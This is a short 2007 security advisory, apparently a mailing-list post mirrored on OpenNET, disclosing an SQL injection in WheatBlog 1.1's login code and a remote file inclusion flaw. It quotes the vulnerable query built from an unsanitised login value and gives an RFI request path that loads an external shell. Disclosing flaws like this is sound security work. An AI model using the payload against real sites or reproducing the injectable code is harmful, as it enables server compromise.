The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


WheatBlog 1.1 RFI/SQL Injection


<< Previous INDEX Search src / Print Next >>
Date: 30 Jun 2007 14:52:04 -0000
From: [email protected]
To: [email protected]
Subject: WheatBlog 1.1 RFI/SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru

Found by E.Minaev ([email protected])
ITDefence.ru 

1) SQL Injection in login function. With help of this injection is possible to make per-symbol brute of tables names of blog's database (magic_quotes_gpc should be tured off).

------------------------------------------
"$sql = "select * from $tblUsers where login = '$login'";
if ( $login	 != $row['login'] )	$valid_user = 0;
                if ( $password  != $row['password'] ) $valid_user = 0;"
------------------------------------------

2) Remote File Inclusion (RFI)
/includes/sessions.php?wb_class_dir=shell?
 


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру